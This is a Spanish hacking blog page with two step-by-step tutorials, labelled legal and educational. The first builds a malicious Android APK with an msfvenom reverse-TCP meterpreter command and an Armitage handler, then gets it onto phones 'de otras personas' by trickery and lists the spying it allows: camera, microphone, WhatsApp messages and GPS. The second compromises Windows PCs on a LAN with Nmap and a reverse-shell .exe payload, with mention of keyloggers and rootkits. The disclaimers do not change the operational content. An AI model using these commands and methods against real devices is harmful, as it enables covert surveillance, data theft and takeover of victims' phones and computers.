Showing posts with label armitage. Show all posts
Showing posts with label armitage. Show all posts

TUTORIAL LEGAL - Como hackear cualquier celular, tablet o dispositivo Android con Armitage y Msfvenom ( metodo del .apk Falso)

Buy cheap awesome NFTs: https://mintable.app/u/cha0smagick

¡Bienvenidos a nuestro tutorial de hacking legal en español! En este artículo, les enseñaremos cómo hackear cualquier celular, tablet o dispositivo Android utilizando las herramientas de Armitage y Msfvenom con el método del .apk Falso.

Antes de comenzar, queremos aclarar que este tutorial es para fines educativos y legales solamente. No nos hacemos responsables del mal uso de esta información. Además, es importante tener en cuenta que el hacking ético es una habilidad valiosa que puede ser utilizada para mejorar la seguridad en línea y proteger a las personas y empresas de los ataques malintencionados.

Con eso dicho, ¡vamos a empezar!

Paso 1: Configuración de Armitage

Lo primero que necesitamos es configurar Armitage, una herramienta de hacking que nos permitirá escanear y atacar dispositivos Android. Para ello, necesitamos instalar Kali Linux en nuestro sistema operativo.

Una vez que hayamos instalado Kali Linux, abrimos Armitage y seleccionamos "Agregar host" para agregar el dispositivo que queremos atacar. Ingresamos la dirección IP del dispositivo y presionamos "Agregar host".

Paso 2: Creación de .apk Falso

El siguiente paso es crear un archivo .apk Falso que pueda ser descargado e instalado en el dispositivo objetivo. Para ello, utilizaremos Msfvenom, una herramienta de creación de exploits.

En la terminal de Kali Linux, ingresamos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<tu dirección IP> LPORT=<puerto> -o <nombre del archivo>.apk

Este comando creará un archivo .apk Falso con el nombre que hayas especificado. Este archivo será nuestro exploit que utilizaremos para hackear el dispositivo objetivo.

Paso 3: Ataque

Una vez que hayamos creado el archivo .apk Falso, lo cargamos en Armitage y lo enviamos al dispositivo objetivo. Si el dispositivo es vulnerable, el exploit se ejecutará y nos dará acceso al sistema.

En este punto, podemos explorar el sistema y hacer lo que queramos, desde acceder a los archivos y la información almacenada en el dispositivo, hasta instalar software malicioso y robar datos sensibles.

Conclusión

¡Felicidades! Ahora sabes cómo hackear cualquier dispositivo Android utilizando Armitage y Msfvenom con el método del .apk Falso. Recuerda que esto es sólo para fines educativos y legales. Es importante utilizar estas herramientas de manera ética y responsable.

Esperamos que este tutorial haya sido útil para ti. Si tienes alguna pregunta o comentario, no dudes en dejarlo en la sección de comentarios a continuación. ¡Nos encantaría saber de ti y crear una comunidad de hackers éticos en español!

Disclaimer: 
Toda actividad de hacking o pentesting, bug bounty o seguridad informática que se realiza en el blog, es realizado en un entorno controlado elaborado por el admin del blog, con permisos para cada acción realizada y sobre cada equipo utilizado, ya que se han adquirido de forma legal para este propósito. En ningún momento se instiga o incentiva a las personas que ven este tutorial a realizar hackeos a equipos sobre los cuales no poseen permisos de manejo o modificación, ya que esto puede conllevar a acciones penales e inclusive, a acciones judiciales en contra del hacker que realice estas acciones. 

Este tutorial es realizado como practica con el único propósito de mostrar a las personas como es que los hackers realizan estas acciones, pero con el fin de que las potenciales víctimas no caigan en este tipo de engaños y o acciones ilegales y que puedan enfrentarse a ellos para evitar perder sus cuentas de redes sociales y| o información personal.



En esta ocasión el blog se enorgullece en presentar un tutorial completo sobre una de las técnicas mas factibles para hackear un celular o un dispositivo cuyo sistema operativo sea android. Para ello lo que haremos es que, a través de armitage y Msfvenom, dos programas gratuitos que viene en las distribuciones de análisis de seguridad como kali o parrot.

1) inicialización del entorno de ataque

Lo primero que haremos para poder realizar nuestra práctica es reconocer a nuestro objetivo. Dado que el blog tiene una política de 100% legalidad, todas las prácticas aquí realizadas se realizaron con dispositivos propios del autor y desde un laboratorio de pentesting generado exactamente con el fin de realizar pruebas legales. Sin mas preámbulos, empecemos con el tutorial.


Primero que nada y para que funcione el armitage, inicializaremos el postgresql con la siguiente orden en distribuciones linux basadas en debian en una nueva consola:

service postgresql start


luego inicializaremos armitage con la orden desde la consola también:

armitage

Esto inicializará el armitage. Por el momento lo dejamos quieto mientras trabajamos con el msfvenom

2) creamos el Apk maligno con Msfvenom


Para ello, abrimos una nueva consola y tecleamos:

msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=8888 R >/root/Escritorior/nombredenuestroapkmaligno.apk

donde:

msfvenom : inicializa msfvenom

android/meterpreter/reverse_tcp: creamos una conexion tcp reversa para saltarnos los protocolos de seguridad de la maquina objetivo.

lhost: La dirección IP de nuestro localhost. En una red local es la interna. Para ataques a un dispositivo fuera de la red LAN utilizar la ip publica.

lport: el puerto local donde recibiremos la conexion. este debe estar abierto en la maquina objetivo para poder realizar el ataque.

/root/Escritorior/nombredenuestroapkmaligno.apk : La ruta y el nombre del archivo a guardar.

3) Creamos el handler (El servidor de nuestro lado)


Luego vamos al armitage y en los ataques de la izquierda buscamos android/meterpreter/reverse_tcp, con lo cual se abrirá una pequeña ventana donde ingresaremos el localhost y el puerto local de nuevo. OJO que estos coincidan con los que creamos en el archivo de msfvenom o no servirá el ataque, ojito y recordadlo. Esto lo que hará es inicializar el handler a la escucha de una posible conexión, la cual crearemos enviando el apk maligno al dispositivo con android.

Recordatorio: este ataque sirve para android hasta el 5.1, de ahi en adelante es un poco mas difícil hacerlo, pero también es posible. Eso lo dejaremos para un próximo tutorial.

4) instalar el apk maligno en el dispositivo

Aquí entra el paso de instalar el apk maligno en el dispositivo remoto objetivo. Aqui es facil ya que es un celular de mi propiedad, pero para hacerlo en otro celular deberás recurrir a toda clase de triquiñuelas extrañas para que te lo reciban, desactiven los protocolos de seguridad y lo instalen en su celular ( ya la seguridad ha avanzado mucho, eh?).


Una vez que esto suceda, ganaremos meterpreter en el dispositivo objetivo, lo cual nos dará potencialmente:

- El pase para poder ganar permisos de administración y así mismo, persistencia.
- acceso a dispositivos perimetrales como cámaras, micrófonos, auriculares, etc.
- Acceso a todos los archivos del celular, incluidas, fotos, conversaciones de whatsapp, y mensajes de texto.
- Permisos de añadir, borrar o modificar archivos
- posición gps del objetivo

Y hasta aquí el tutorial de hoy. No se explicará la persistencia en este momento, pero por lo pronto estos son los básicos de un hackeo de celular mediante la técnica del apk maligno. Recuerda que este es el hilo de la conversación sobre este tema en el blog y que cualquier pregunta que pongas en los comentarios la resolveremos entre todos los lectores y por supuesto su servidor, freakbizarro. Hasta la próxima.



Como hackear cualquier Windows XP/vista/7/8/10 con Linux ARMITAGE (En redes LAN) Tutorial

Armitage te permite hackear fácilmente en un entorno linux
Disclaimer: este artículo esta diseñado como un tutorial educativo y en ningún momento se pretende atentar contra nada ni nadie. El autor no se hace responsable del uso dado a la información aquí brindada ni de otro tipo de utilización del material que no sea de aprendizaje.

El día de hoy y en nuestro laboratorio virtual de hacking hemos realizado el experimento de como se podría hackear un computador comprometiendo su información en una red LAN. Por supuesto todo lo hemos realizado de manera legal, mostrando paso a paso el procedimiento utilizado para ganar acceso al sistema que hemos escogido. 

Esta es una muestra de como se hackea un computador mediante el método de inyectar un payload en un ejecutable, para luego ejecutarlo en la máquina objetivo y ganar control total del él. Aquí hacemos prueba de vnc, prueba de exploración de archivos y captura de pantalla. Este método es valido para pc dentro de una misma red local solamente.

Para instalar el armitage en distribuciones debian, ponemos el comando, pero en distribuciones como kali linux o como parrot OS viene preinstalado por ser una herramienta muy útil asi que en estos casos solo queda ejecutarlo:

apt-get install armitage

lo primero que debemos hacer es iniciar el postgresql. Abrimos una consola y tipeamos lo siguiente:

service postgresql start

luego desde la misma consola iniciamos el armitage:

armitage

Después de abrirlo y esperar a que este totalmente cargado, seguiremos básicamente los mismos pasos que utilizaríamos para atacar un objetivo:

1) enumeramos los objetivos con Nmap
2) hacemos un escaneo de vulnerabilidades
3) lanzamos el ataque
4) ganamos meterpreter

Para ello, el día de hoy utilizaremos un payload, la parte del malware que realiza la acción maliciosa y que nosotros crearemos en la primera parte del laboratorio de hoy. Así que , sin mas, empecemos.

Primero que todo y este es un paso opcional, limpiaremos el escritorio del armitage si es que tenemos proyectos anteriores con el programa y no los necesitamos mas. para ello, vamos a hosts> clear databases para realizar esta acción.

Luego de esto, lo que haremos es ir a hosts > nmap scan > quick scan en este caso, pero pueden hacerse escaneos mucho mas complejos dependiendo de los permisos que poseemos en la red que estemos escaneando. ten en cuenta que si es un escaneo de caja roja o caja negra, es muy posible que te detecten con escaneos masivos o con escaneos complejos, así que finalmente la decisión es tuya. Ya que no es el objetivo de esta entrada, no entraremos en detalles del nmap del cual se realizará una entrada posterior a profundidad. Aquí lo que queremos detectar es el sistema operativo para enumerar el objetivo y así poder decidir cual va a ser el exploit con el cual se va a trabajar en esta ocasión.

Para poder escanear, nos va a pedir una ip, la cual en este caso será nuestra IP local ya que tenemos seteado el laboratorio de pruebas propio y conectado en red. Este tipo de escaneo también se puede hacer con IP publicas pero OJO a quien escaneas y porque porque te puede caer el FBI a la casa y no queremos eso.


Esperamos a que complete el proceso de escaneo y veremos como los computadores y|o servidores aparecerán en el recuadro gris del programa, de tal manera que veremos desplegado en cada pantalla el sistema operativo de cada una de las maquinas con su respectiva IP local.


Ataque

Seleccionamos la maquina a la cual queremos hacerle objetivo y vamos a attacks > find attacks. Esto enumerará los ataques a la máquina objetivo. Cuando termine nos desplegará a la izquierda una serie de exploits, de los cuales nos dirigiremos a los de windows, después de que el escaneo objetivo en este caso, mostrase que nuestro objetivo es un pc con Windows 10.


Creación del payload

Para hacer el caso básico de armitage, haremos un payload con una conexión reversa, la cual tiene como objetivo saltarse las restricciones que tienen los firewalls en los puertos que están abiertos. damos doble click y el nos pedirá los siguientes datos para crear el payload y en la parte que dice output, dado que es para windows, lo compilaremos como un .exe

LHOST: la direccion IP del localhost
LPORT: el puerto por el cual se va a conectar el localhost


Seleccionamos el lugar para guardar nuestro payload compilado y le damos launch. esto inmediatamente nos abrirá una sesión de meterpreter en escucha, a la espera de que se ejecute el .exe que acabamos de crear. En nuestro caso, tomamos el .exe y lo guardamos en una USB y lo conectamos físicamente al pc. esto causará, en caso de establecerse la conexión, que la pantalla del pc objetivo se llenará de truenos.


Explotación

ya con la sesión de meterpreter iniciada, podrás extraer, poner, borrar y modificar archivos, abrir aplicaciones remotamente, ver los dispositivos como cámaras y escuchar los micrófonos, instalar keylogger, rootkits, etc.





No voy a profundizar en las técnicas de post-explotación y persistencia, porque es tema de otro post, pero con lo consignado aquí, se espera que puedas desarrollar correctamente la práctica. Todo lo anterior se muestra a continuación en el vídeo que se ha preparado explícitamente para el blog y para no tener que extender lo escrito y que el post sea mas didáctico. Cualquier pregunta o inquietud siéntete libre de presentarla en los comentarios bajo el post. Este es el post oficial de armitage en el blog, así que remite aqui cualquier pregunta sobre el programa.

Sin mas, el video-tutorial de como utilizar armitage: